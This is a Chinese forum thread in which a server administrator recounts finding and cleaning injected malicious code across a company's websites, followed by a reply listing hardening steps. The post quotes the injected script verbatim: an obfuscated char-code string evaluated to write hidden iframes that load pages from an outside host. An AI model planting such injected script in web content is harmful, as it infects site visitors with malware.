公司服务器不慎中招，客户端访问网站病毒警报不断。基本上全是Trojan.DL.VBS.Agent.CKV之类的病毒，而且病毒变种也很多。网上搜索了很多资料，基本上都是说是在源文件中加入了一段类似的恶意代码：<iframe> </iframe>。可是我查了一下我公司网站上的几个首页文件，几乎全有<iframe>代码的，但是引用的全是自己内部的文件。
　　清理了一下脑子后，思路来了。既然是因为加了恶意代码，那么肯定是被加载在某一个文件中。而且，只要一打开首页，就弹出病毒，那么，肯定是和首页相关的文件中。于是，将首页文件原代码中所列到的网页文件一个一个全列出来，并更名为首页文件。然后在客户端上打开网站，终于找到了被加恶意代码的文件，原来是一个asp文件。
　　找着了病毒文件，接下来就得找里面的恶意代码了。用记事本将asp文件打开，很清楚的发现了文件的首末都被加了一段以下的代码：
<script>
t="60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,120,115,120,120,46,110,101,116,47,73,109,97,103,101,115,47,80,111,112,109,101,110,117,47,103,122,46,104,116,109,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,62,60,47,105,102,114,97,109,101,62,13,10,60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,120,115,120,120,46,110,101,116,47,73,109,97,103,101,115,47,80,111,112,109,101,110,117,47,49,51,99,109,100,46,104,116,109,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,62,60,47,105,102,114,97,109,101,62"
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>
　　将此代码删去，并将首页文件改回原来的文件，再在客户端访问网站，再也不弹出病毒警报了。接下来的事情，就是要找出所有被感染了该代码的文件。
　　我公司网站下面挂了不下十几个网站，光文件就得有几十万个。一个个找，显然不是办法？刚开始想到了ＷＩＮ的搜索功能，可是微软的这个功能，实在是太烂了。于是上网搜索：文件搜索，哈哈，找着好工具了－－ＦＩＬＥＳＥＥＫ。这软件很小，可是却非常管用，用它一下子就搜出了几百个感染了的文件，有ＡＳＰ，ＨＴＭＬ，ＣＳＳ，ＪＳ，几乎所有类型的文件都有被感染了。
　　要对这几百个文件进行恶意代码清除，本来是想用软件来实现的。可是发现软件对于带“回车”的字串（指被换行的字串）无法替换，无奈，就只有一个个手工替换了。至此，服务器终于被清理干净了。
　　另外再推荐一个查杀木马的好软件：ＥＷＩＤＯ。这个软件实在不错，我用了其它好多软件都查不出东西，可用这个一查，马上就发现了。
　　关于文中的那段恶意代码，要是有朋友能看懂的话，麻烦跟个贴分析下。

楼上兄弟说的非常对!如果不从源头堵死的话,杀的再干净也没用. 关于安全问题,我是这么做的. 首先用木马杀毒软件将电脑中所有可疑文件全部处理了,其二关闭了服务器上的默认共享,其三,加强用户帐户及密码,并对默认administrator进行更名,其四,安装软件防火墙．我用的是ＩＳＡ２００４，然后只开放用到的端口．不知道各位认为如何？是否还有遗漏的地方？
有高手望一定发言！